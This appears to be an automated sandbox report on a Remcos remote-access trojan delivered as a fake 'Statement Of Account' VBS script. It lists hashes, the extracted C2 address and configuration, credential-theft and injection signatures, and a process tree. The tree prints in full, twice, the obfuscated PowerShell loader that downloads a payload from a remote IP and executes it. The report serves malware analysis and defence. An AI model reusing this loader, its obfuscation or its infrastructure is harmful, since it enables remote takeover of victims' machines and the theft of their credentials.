remcos | daee067e46a83ec3c0e4f77bf53e126f076847b781bda39e3d13f0f6044be2f4

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Statement Of Account (2).vbs
Size

23KB
MD5

079ba09e4145b868609a94f1a69915e1
SHA1

9db5bac8bede1ef4a83ee41b3a503bca76696bdc
SHA256

daee067e46a83ec3c0e4f77bf53e126f076847b781bda39e3d13f0f6044be2f4
SHA512

9f9e484ba9232c201157c2b8a122da4a8686d807bfa22d05185df16dac4238aa9bc1923334e4249b7925b44f0515f30a60a894859a577f27d85ff7e9d66bed16
SSDEEP

384:ZoEnW+HRMkKZgrWfVndBc+/oQwZ/No1/Ip1fHr6dey0OOnzEJ0:vH2WahdBc6MSQ76wnzEJ0

Score

10^/10

remcos remotehost collection rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

103.237.87.159:9462

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-LO8JHK
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral1/memory/1504-48-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral1/memory/1220-47-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral1/memory/1504-48-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral1/memory/1220-47-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1504-48-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1220-47-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/324-52-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 2232 WScript.exe
7 2232 WScript.exe
10 2724 powershell.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1904 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2236 powershell.exe
1904 wab.exe

flow	pid	process
3	2232	WScript.exe
7	2232	WScript.exe
10	2724	powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

pid	process
1904	wab.exe

pid	process
2236	powershell.exe
1904	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 2236 set thread context of 1904	2236	powershell.exe	wab.exe
PID 1904 set thread context of 1220	1904	wab.exe	wab.exe
PID 1904 set thread context of 1504	1904	wab.exe	wab.exe
PID 1904 set thread context of 324	1904	wab.exe	wab.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2724 powershell.exe
2236 powershell.exe
2236 powershell.exe
1220 wab.exe
1220 wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exewab.exe

pid process

2236 powershell.exe
1904 wab.exe
1904 wab.exe
1904 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2724 powershell.exe
Token: SeDebugPrivilege 2236 powershell.exe
Token: SeDebugPrivilege 324 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1904 wab.exe

pid	process
2724	powershell.exe
2236	powershell.exe
2236	powershell.exe
1220	wab.exe
1220	wab.exe

pid	process
2236	powershell.exe
1904	wab.exe
1904	wab.exe
1904	wab.exe

description	pid	process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	324	wab.exe

pid	process
1904	wab.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 2232 wrote to memory of 2724	2232	WScript.exe	powershell.exe
PID 2232 wrote to memory of 2724	2232	WScript.exe	powershell.exe
PID 2232 wrote to memory of 2724	2232	WScript.exe	powershell.exe
PID 2724 wrote to memory of 2812	2724	powershell.exe	cmd.exe
PID 2724 wrote to memory of 2812	2724	powershell.exe	cmd.exe
PID 2724 wrote to memory of 2812	2724	powershell.exe	cmd.exe
PID 2724 wrote to memory of 2236	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2236	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2236	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2236	2724	powershell.exe	powershell.exe
PID 2236 wrote to memory of 1956	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 1956	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 1956	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 1956	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 1904	2236	powershell.exe	wab.exe
PID 2236 wrote to memory of 1904	2236	powershell.exe	wab.exe
PID 2236 wrote to memory of 1904	2236	powershell.exe	wab.exe
PID 2236 wrote to memory of 1904	2236	powershell.exe	wab.exe
PID 2236 wrote to memory of 1904	2236	powershell.exe	wab.exe
PID 2236 wrote to memory of 1904	2236	powershell.exe	wab.exe
PID 1904 wrote to memory of 1220	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1220	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1220	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1220	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1220	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1504	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1504	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1504	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1504	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 1504	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 324	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 324	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 324	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 324	1904	wab.exe	wab.exe
PID 1904 wrote to memory of 324	1904	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Statement Of Account (2).vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed';If (${host}.CurrentCulture) {$Globalisere++;}Function Ligningsanvisningerne($Afskaffelsen){$Ufuldbaarnes=$Afskaffelsen.Length-$Globalisere;$Udefinerlig='SUBsTRI';$Udefinerlig+='ng';For( $Artikuler42=7;$Artikuler42 -lt $Ufuldbaarnes;$Artikuler42+=8){$Tossestregers+=$Afskaffelsen.$Udefinerlig.Invoke( $Artikuler42, $Globalisere);}$Tossestregers;}function Brugsprogrammet($Ginies){ . ($Hackmack190) ($Ginies);}$Parergon=Ligningsanvisningerne 'A.vekslMBegettio dysswizRodentbiBrnerigl Ferie.lUdstatiaAgentur/ ,ataga5Kal.rif.Intersp0.rmekor Befjels(V.ntrilWSubsistiGeodesinchristid.adonnao mphasiwHalvabesNemmere MaalstnN GuldkoTFremmed Offend1Manleyf0 Heirlo.Stylost0H rsewo;reflekt Tum.dneWBa.dlngiBucklernAgatena6 Corona4Blinded;A.ikome Redbuckx midika6Defaiti4 Hologr;.gninge lynlaasrCiga,mav ,edhjl:nitter.1Bes.yre2Udsaves1Skalapa.Forblff0aggeros)Em.arra BetalbaGObsequieproslavcWor mankVandtiloSos,uil/Garruli2 Micros0H.meomo1Nomisti0Fraynsk0 Bakkus1Beedige0P.pperw1 lectua CoatninFStadseriDobbeltrsekarsieUnderkjfentocaro SpectaxOutwast/Hkkelbs1C,mposi2Hje,net1Opflask.Michela0Perdifo ';$Forfalden=Ligningsanvisningerne 'Ooma.tiUKunstnes T,ansce C.ossrrB.ndfil- SudansAPed palgFiskebae Fa,bornLoreas.tBroodie ';$Tyndtarmsbetndelser=Ligningsanvisningerne 'DobbelthH,teroptboya,dst EnkeltpPuzzle,:R infec/waterpi/Un.ccus1M,dimnu0Shaving3Sterla .St,pefi2Bowwort3For,lum7Persill.Fantasi8Saftnin6 Squelc.Ansvarl2 Bekrf 4Spncoun7Prereve/N,vellrG Jordske RoguinaImpugnenHjl ere. nconveaFrak iosDockworiTippeel ';$Melodramatics=Ligningsanvisningerne 'frate.n>Slut rk ';$Hackmack190=Ligningsanvisningerne 'Rad,obli AntitueMediocaxtaliaco ';$Forskaanes='Regnslagets';$Salutiferously = Ligningsanvisningerne 'rigsadveSkrdderc Splendh analisoRidde l Microco%Grnseega Squ shpP.oresyp H mitrdAppellea mmortatRdnbeneaPerceva% He.ebl\plapredLSydamernT,ekvarpIndiskmaParaguauMo embrsNewcomeeBe,egnirHe,lsbu. AntiopW OviparhPradogeiNonchas Algolag&Aktiver&Impress RadikalekortarmcSkeletshSquilgeoShirtfr svaleretAfsta d ';Brugsprogrammet (Ligningsanvisningerne ' icropt$Brus,regVivi.arlDrejeknoSypigerbFlej.skaUdskrerlMishand: PrakriCDkningsaMiasmoun Unvarin Kagchoi.xpositnShikseaeImbroc,s,agedejs Editi,eSnigmo,s ,aicha= Stikpr(Naa igsc .oshhjm FlettedW.atnot Paatale/knoensncm.sbapt Tidssk$FortidsSkildekraTacit,flInstin,uDipter.tOpga etiFinansmfRipostoeTj slagrconsecro LabiovuEthn,rcsOmsiderlViljekryUndersk)Biennio ');Brugsprogrammet (Ligningsanvisningerne 'dombogp$IrenicagKonfektlMarmarooAttes,mb ,ftalmaemanciplVid.res:EgnsudvDGlutinajfibrillaUnt,nineNedjustv OthililElementeCostumekoutglowu,ubricelIntrod t TrstubeGul rdrr Flag.lnMotatoreAlectry=Rumbely$cerat,pTTua,egeyti,rervn Dualisd CarbogtCates.raKnackinr recensmFolkesaslevnedsbPeerlese EventytForsvarnLaserstdMoggan,e FragtslTranscesdagvrkeeSelvg dr emetsv.Part ersRentenep Fo,kevlMeningsiSilverit Slayye(Antholo$PolygonMBullioneEstral.lSligh.ioDiscretd TrevnerTr,nhimaTim,savmAstmatiaWildasvtAnakolui Sat rscRastepls.teamer)Hermann ');Brugsprogrammet (Ligningsanvisningerne 'Frontis[ DepainNTranspleMiscountstemmej.Apati eSU,eneureTrossa r RosebuvSpeleani GenealcOutsmoke ProcrePInd treoAfholdsiHydrophnLindormt wha erMOplysn.aKrse.svnmissileaB,nnockg roatere Pent,trUnmod,r] pildev:Henho.d: TajgasSAfrig,eeBrdrefocFluoratuTolpklarUnsche.i S stemtSa menkymilieumPCounterrDrabbinoKapse at AdjectoStedsbecFl,treeoTroppetlDetache Bi.gins=Overcon Ca,amif[ BonamaNMucusinemastigatOpiumva. f,etkoS BetnkseBesanthcParato.uElenaparhavbioli ancerctCsectpayXylofonPcorymberapartheoAcheeratAfbetalolepidodcU mrkefoSchuftelBarric.TGelatinyTaareflp Klokkee,unjakk]Fagotti:Archway:repan.lTGo gerellaxativsAchrom.1Mekanis2Modera. ');$Tyndtarmsbetndelser=$Djaevlekulterne[0];$Oprrsaander= (Ligningsanvisningerne 'Fjor.ar$Komm.ntgRekursil Sulky,o Engangbtegnebra Inertil velv.l:telegralBrofagesForsmmenOro.anciLepi.odnFiv,bargRivebr sIngmundhLigningfVacatiot SvadaeeLands,orDeinothn S.arlae granul=Non,goiN Capybae Vertikw Endoce-El,mentONoncoopbChokolaj H.vedmeGradsfocVasodeptHimmeri KaproniSCasebeayRapportsO,positt StudieeTppemndm F,itte.PonenssNUnha.dieMalleabtCe,aove.AvisposWstringmePirre,ibGeyser,CFirdobllB stniniPa,suseeruskinin Fa.alit');$Oprrsaander+=$Canninesses[1];Brugsprogrammet ($Oprrsaander);Brugsprogrammet (Ligningsanvisningerne 'Outbo,s$ ShariflKommodesMesothen Venneni Domf.dn G,rrulgPacificsFlyk.prhInfinitfWhalenstLaughineTitulaer.remorsnGea dugeTele,et. .opulaHHo.edpuedis.ribaFljsb sdStykke.eFormkagr NoncomsTienden[ Prdika$Strid.nFKalkul o M adowrManagerfAntik,iaAandssllBesput d RetouceHelt,san Indeks].kkerfo=Spytkrl$.ichytaPReakt oaEnekammrTil,risePermatrrKnockougPreludioCumulatn Gridde ');$riving=Ligningsanvisningerne 'Grmmetb$reptilelFaregrusAgitatonInformaiKontinenSmrreb g Ch,dres Eyes,ahRenseanfAristoktGlatte,e EradiarDi kespnRhemi.te Udbred.SaltosbDMak oenoBybudinwforelsnntenalgilHekto roForenkla DisherdSugefddF Sytj.riforhrdelhjrecenebenchma( discom$PlunkedTSnildenyTrhvepsnBlindgndAquat,ntArbejd a SlutdarClinsubm FilmatsVimfulbb.nfeloneAdmoni,tUnderbyn .angskd Juici.eTurnin lDamploksAlbiziaeSeptemfrUdd,tas, Secrep$MenneskLBefolknoWorkhourMalaxateFoldecynLevant.t.agniosz rojekt)Antifla ';$Lorentz=$Canninesses[0];Brugsprogrammet (Ligningsanvisningerne 'Oligorh$ KernergP llesclFodgngeo U.revebHexosepa Aarr klB,rggyl:InverneSGastropo,travaikAftenstkUnavowaeRecompahProagulo Fd ralls,vlungdYabatrleunr.lyer StormfnRumdeleeekstrav=Dellsni( AnnuleT Weeze.e Ku.ingsHjernert Pleura-DiatomiPGymkhanaA,iogentLandvsehAf,bnin Produkt$PreinstL.lderamo mikr crParafraeR defogn ReservtEr vervz minde.)maskinf ');while (!$Sokkeholderne) {Brugsprogrammet (Ligningsanvisningerne 'Rulam.e$B.tulisgTopcheflBevge.soBrugervbUnmode aGrfteholMarleaa:UnrejoiL sig,rea.neredev nudelevLitherlaInd spon Ac omydstaaltreAssaulttfortykk=Coun,ed$Krypt,gtLderingr xtrafuUdringneKode.ek ') ;Brugsprogrammet $riving;Brugsprogrammet (Ligningsanvisningerne 'Ber.dskS BrleabtThiswisaLejrskorRlighedtTagdkke-Atto.nuSAfkalknl CorporeDdfdseleModalitpPyrote, Fjer,st4Tydeu,d ');Brugsprogrammet (Ligningsanvisningerne 'Antisoc$ Bettorg Aktionl F,lizioEfter lbIndervraEsoc,folnotarie:KuglereSUnreguloUnnaturkVikarikkBagladeeUnac.omh Sprge.o Unreprl NeliebdFalsetseSulphisrSpandganM ggotyeReident=Otteogt(TabitasTLkkestneFototeksUndiffetFarvelg-interpePRelatioaSemiliqtBortfo,hBendsfo Indrids$Om.elenL DemystoDaabsvirC rambye MaximinBogfr.etAflysesz Inq,is)Origina ') ;Brugsprogrammet (Ligningsanvisningerne 'Videoku$MdedeltgThetarylRevitaloChalottbUndern,aHunchbal s,anda: GrnsevPOuttwinrbloddraoUdtryksjCheapsceZ oparakHarassitOmph loeLag,rtir Pro.ru=Spinula$RomanisgFranceslFolkehroMovi.labskydninaDroeftelSuggest:BelysniMTaxeme.cRetroacd Precelo Ko ceruKundsk.gCaravanaSteelwolSkolem,lapparat+Rerenta+Victori% Uncomb$ BevareDBefugtnjLumbianaA ommage SuburbvPtotic,lNonmovee Mind,tk BuldreuSupercolGeolatrtR,keudveIn.olverTicklebnVirgolyeSeeming. SgeprocUngrippoUncry tuSlenbugnTnkeligtBriste. ') ;$Tyndtarmsbetndelser=$Djaevlekulterne[$Projekter];}$Vidervrdige=348811;$Snigmyrdedes=30612;Brugsprogrammet (Ligningsanvisningerne 'genneml$BddelksgDemerbilAal.orgoBla.folb blodsta .bpspol Herree:O.hidseRCrispieeSel.rnelOutwasteMimeoouvFaderskeRetfrdinge,icultIsoterm pel rin=Kedelsm AfmeldGOrnameneAlkalo.t Indbin-Soa.eduCPeripneo Oxidizn TankmatFina,smeSpaltennKumenintForpagt tekstbe$ R.cenrLCenturioPentecorPanamaiePokaltunSe,refitSupe,stz Emball ');Brugsprogrammet (Ligningsanvisningerne 'Trkgrun$Angka.yg Bra.hylSangtekoOverbevbSejtrknaD.arekilHvidm l:Delab aVforhaaba RaceadnsoberindstedsanrAnsttel S,mmerf=Bil ion Forgrim[PseudofSKae.ermypilinspsUnmediat Seniore Leci imStunt,e.RenslysCCacodonoForsor.nOtteogtvsensomreKallacirFors dot Predis]Uoplagt:Gnattie: .respeF ,ukkedrTo.elejoDagpengmVociferBP,overbaSinewras FruktoePh,toce6 rabidi4 SecretSVennekrtgal.erirSigtendiPhyl opnInpour gO,eocys(Ammerne$Aco.misRHandlekeFen,eril So bereManasquvRetireeeBoutelon Deas.itPaamind)Telegra ');Brugsprogrammet (Ligningsanvisningerne ' Oatydy$Trije.sg ModerllheemraaoUnripedb DiminuaDepositlslotted:Serviett Polysua BrochamCointere CaractiFedterinWagweno Dag,sta=Sacromo Temulen[RavenouSDi,fusiygenic,ts Ko muntHelc,ideChefposmsp.ctro.UvenskaTPi sedaekongsgaxTartarit Plough.Bossa.oEDom.fldnconsolec Fungico NaturldPjaskeni Libe tnO.erthrgUnsacri]Gly ure:Uncu,be:BanderiANonecceSStrygerC IchthyISystemeIDraftin.NonfragGIllessrePent.grtInter.eSPipinghtDigitalrmalefici,altedenJuggledgTypehol(,opulis$ObservaVOmkvdena raa,linFoste,idVenomi.rIndbygg)Coccusa ');Brugsprogrammet (Ligningsanvisningerne 'Nonspor$KalvestgKolonielOverflyo flsserb ,homboaRostrallfragt k:ElectromReallowl azionakwiltslaeDirplusk Vit igoFrilgnin EftertsTress,eePerik nrKlevognvHandelseUgenkensStrammef.arnsseaFjeder b rskninrLagerlii.megabsk Fe.tilkErost,aeTaurocorAret abnPoetryleKnoglem=Toluidi$Afstaaetdisambia UninvemFodbolde FyrassiAdelsslnNonfact.RboensbsMes,speuSu,trudb PopulasBagtipptFolketirJernrrfi Rebusin afple,gVildska(Bonbonn$TregrenVSocio,eiAnarchad Trav,leRdderl.r Propfuv exapodrVandrefdO,erstriHem.secgTheraphePont,ne, underl$ AziethSVoic,prnOpmarchiTrdiagrgDiapalmm faglityStedsndr Svirved Ted.ume ResortdFolkmoteSlambehsNoakine)Ampulet ');Brugsprogrammet $mlkekonservesfabrikkerne;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lnpauser.Whi && echo t"
3⤵
PID:2812

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed';If (${host}.CurrentCulture) {$Globalisere++;}Function Ligningsanvisningerne($Afskaffelsen){$Ufuldbaarnes=$Afskaffelsen.Length-$Globalisere;$Udefinerlig='SUBsTRI';$Udefinerlig+='ng';For( $Artikuler42=7;$Artikuler42 -lt $Ufuldbaarnes;$Artikuler42+=8){$Tossestregers+=$Afskaffelsen.$Udefinerlig.Invoke( $Artikuler42, $Globalisere);}$Tossestregers;}function Brugsprogrammet($Ginies){ . ($Hackmack190) ($Ginies);}$Parergon=Ligningsanvisningerne 'A.vekslMBegettio dysswizRodentbiBrnerigl Ferie.lUdstatiaAgentur/ ,ataga5Kal.rif.Intersp0.rmekor Befjels(V.ntrilWSubsistiGeodesinchristid.adonnao mphasiwHalvabesNemmere MaalstnN GuldkoTFremmed Offend1Manleyf0 Heirlo.Stylost0H rsewo;reflekt Tum.dneWBa.dlngiBucklernAgatena6 Corona4Blinded;A.ikome Redbuckx midika6Defaiti4 Hologr;.gninge lynlaasrCiga,mav ,edhjl:nitter.1Bes.yre2Udsaves1Skalapa.Forblff0aggeros)Em.arra BetalbaGObsequieproslavcWor mankVandtiloSos,uil/Garruli2 Micros0H.meomo1Nomisti0Fraynsk0 Bakkus1Beedige0P.pperw1 lectua CoatninFStadseriDobbeltrsekarsieUnderkjfentocaro SpectaxOutwast/Hkkelbs1C,mposi2Hje,net1Opflask.Michela0Perdifo ';$Forfalden=Ligningsanvisningerne 'Ooma.tiUKunstnes T,ansce C.ossrrB.ndfil- SudansAPed palgFiskebae Fa,bornLoreas.tBroodie ';$Tyndtarmsbetndelser=Ligningsanvisningerne 'DobbelthH,teroptboya,dst EnkeltpPuzzle,:R infec/waterpi/Un.ccus1M,dimnu0Shaving3Sterla .St,pefi2Bowwort3For,lum7Persill.Fantasi8Saftnin6 Squelc.Ansvarl2 Bekrf 4Spncoun7Prereve/N,vellrG Jordske RoguinaImpugnenHjl ere. nconveaFrak iosDockworiTippeel ';$Melodramatics=Ligningsanvisningerne 'frate.n>Slut rk ';$Hackmack190=Ligningsanvisningerne 'Rad,obli AntitueMediocaxtaliaco ';$Forskaanes='Regnslagets';$Salutiferously = Ligningsanvisningerne 'rigsadveSkrdderc Splendh analisoRidde l Microco%Grnseega Squ shpP.oresyp H mitrdAppellea mmortatRdnbeneaPerceva% He.ebl\plapredLSydamernT,ekvarpIndiskmaParaguauMo embrsNewcomeeBe,egnirHe,lsbu. AntiopW OviparhPradogeiNonchas Algolag&Aktiver&Impress RadikalekortarmcSkeletshSquilgeoShirtfr svaleretAfsta d ';Brugsprogrammet (Ligningsanvisningerne ' icropt$Brus,regVivi.arlDrejeknoSypigerbFlej.skaUdskrerlMishand: PrakriCDkningsaMiasmoun Unvarin Kagchoi.xpositnShikseaeImbroc,s,agedejs Editi,eSnigmo,s ,aicha= Stikpr(Naa igsc .oshhjm FlettedW.atnot Paatale/knoensncm.sbapt Tidssk$FortidsSkildekraTacit,flInstin,uDipter.tOpga etiFinansmfRipostoeTj slagrconsecro LabiovuEthn,rcsOmsiderlViljekryUndersk)Biennio ');Brugsprogrammet (Ligningsanvisningerne 'dombogp$IrenicagKonfektlMarmarooAttes,mb ,ftalmaemanciplVid.res:EgnsudvDGlutinajfibrillaUnt,nineNedjustv OthililElementeCostumekoutglowu,ubricelIntrod t TrstubeGul rdrr Flag.lnMotatoreAlectry=Rumbely$cerat,pTTua,egeyti,rervn Dualisd CarbogtCates.raKnackinr recensmFolkesaslevnedsbPeerlese EventytForsvarnLaserstdMoggan,e FragtslTranscesdagvrkeeSelvg dr emetsv.Part ersRentenep Fo,kevlMeningsiSilverit Slayye(Antholo$PolygonMBullioneEstral.lSligh.ioDiscretd TrevnerTr,nhimaTim,savmAstmatiaWildasvtAnakolui Sat rscRastepls.teamer)Hermann ');Brugsprogrammet (Ligningsanvisningerne 'Frontis[ DepainNTranspleMiscountstemmej.Apati eSU,eneureTrossa r RosebuvSpeleani GenealcOutsmoke ProcrePInd treoAfholdsiHydrophnLindormt wha erMOplysn.aKrse.svnmissileaB,nnockg roatere Pent,trUnmod,r] pildev:Henho.d: TajgasSAfrig,eeBrdrefocFluoratuTolpklarUnsche.i S stemtSa menkymilieumPCounterrDrabbinoKapse at AdjectoStedsbecFl,treeoTroppetlDetache Bi.gins=Overcon Ca,amif[ BonamaNMucusinemastigatOpiumva. f,etkoS BetnkseBesanthcParato.uElenaparhavbioli ancerctCsectpayXylofonPcorymberapartheoAcheeratAfbetalolepidodcU mrkefoSchuftelBarric.TGelatinyTaareflp Klokkee,unjakk]Fagotti:Archway:repan.lTGo gerellaxativsAchrom.1Mekanis2Modera. ');$Tyndtarmsbetndelser=$Djaevlekulterne[0];$Oprrsaander= (Ligningsanvisningerne 'Fjor.ar$Komm.ntgRekursil Sulky,o Engangbtegnebra Inertil velv.l:telegralBrofagesForsmmenOro.anciLepi.odnFiv,bargRivebr sIngmundhLigningfVacatiot SvadaeeLands,orDeinothn S.arlae granul=Non,goiN Capybae Vertikw Endoce-El,mentONoncoopbChokolaj H.vedmeGradsfocVasodeptHimmeri KaproniSCasebeayRapportsO,positt StudieeTppemndm F,itte.PonenssNUnha.dieMalleabtCe,aove.AvisposWstringmePirre,ibGeyser,CFirdobllB stniniPa,suseeruskinin Fa.alit');$Oprrsaander+=$Canninesses[1];Brugsprogrammet ($Oprrsaander);Brugsprogrammet (Ligningsanvisningerne 'Outbo,s$ ShariflKommodesMesothen Venneni Domf.dn G,rrulgPacificsFlyk.prhInfinitfWhalenstLaughineTitulaer.remorsnGea dugeTele,et. .opulaHHo.edpuedis.ribaFljsb sdStykke.eFormkagr NoncomsTienden[ Prdika$Strid.nFKalkul o M adowrManagerfAntik,iaAandssllBesput d RetouceHelt,san Indeks].kkerfo=Spytkrl$.ichytaPReakt oaEnekammrTil,risePermatrrKnockougPreludioCumulatn Gridde ');$riving=Ligningsanvisningerne 'Grmmetb$reptilelFaregrusAgitatonInformaiKontinenSmrreb g Ch,dres Eyes,ahRenseanfAristoktGlatte,e EradiarDi kespnRhemi.te Udbred.SaltosbDMak oenoBybudinwforelsnntenalgilHekto roForenkla DisherdSugefddF Sytj.riforhrdelhjrecenebenchma( discom$PlunkedTSnildenyTrhvepsnBlindgndAquat,ntArbejd a SlutdarClinsubm FilmatsVimfulbb.nfeloneAdmoni,tUnderbyn .angskd Juici.eTurnin lDamploksAlbiziaeSeptemfrUdd,tas, Secrep$MenneskLBefolknoWorkhourMalaxateFoldecynLevant.t.agniosz rojekt)Antifla ';$Lorentz=$Canninesses[0];Brugsprogrammet (Ligningsanvisningerne 'Oligorh$ KernergP llesclFodgngeo U.revebHexosepa Aarr klB,rggyl:InverneSGastropo,travaikAftenstkUnavowaeRecompahProagulo Fd ralls,vlungdYabatrleunr.lyer StormfnRumdeleeekstrav=Dellsni( AnnuleT Weeze.e Ku.ingsHjernert Pleura-DiatomiPGymkhanaA,iogentLandvsehAf,bnin Produkt$PreinstL.lderamo mikr crParafraeR defogn ReservtEr vervz minde.)maskinf ');while (!$Sokkeholderne) {Brugsprogrammet (Ligningsanvisningerne 'Rulam.e$B.tulisgTopcheflBevge.soBrugervbUnmode aGrfteholMarleaa:UnrejoiL sig,rea.neredev nudelevLitherlaInd spon Ac omydstaaltreAssaulttfortykk=Coun,ed$Krypt,gtLderingr xtrafuUdringneKode.ek ') ;Brugsprogrammet $riving;Brugsprogrammet (Ligningsanvisningerne 'Ber.dskS BrleabtThiswisaLejrskorRlighedtTagdkke-Atto.nuSAfkalknl CorporeDdfdseleModalitpPyrote, Fjer,st4Tydeu,d ');Brugsprogrammet (Ligningsanvisningerne 'Antisoc$ Bettorg Aktionl F,lizioEfter lbIndervraEsoc,folnotarie:KuglereSUnreguloUnnaturkVikarikkBagladeeUnac.omh Sprge.o Unreprl NeliebdFalsetseSulphisrSpandganM ggotyeReident=Otteogt(TabitasTLkkestneFototeksUndiffetFarvelg-interpePRelatioaSemiliqtBortfo,hBendsfo Indrids$Om.elenL DemystoDaabsvirC rambye MaximinBogfr.etAflysesz Inq,is)Origina ') ;Brugsprogrammet (Ligningsanvisningerne 'Videoku$MdedeltgThetarylRevitaloChalottbUndern,aHunchbal s,anda: GrnsevPOuttwinrbloddraoUdtryksjCheapsceZ oparakHarassitOmph loeLag,rtir Pro.ru=Spinula$RomanisgFranceslFolkehroMovi.labskydninaDroeftelSuggest:BelysniMTaxeme.cRetroacd Precelo Ko ceruKundsk.gCaravanaSteelwolSkolem,lapparat+Rerenta+Victori% Uncomb$ BevareDBefugtnjLumbianaA ommage SuburbvPtotic,lNonmovee Mind,tk BuldreuSupercolGeolatrtR,keudveIn.olverTicklebnVirgolyeSeeming. SgeprocUngrippoUncry tuSlenbugnTnkeligtBriste. ') 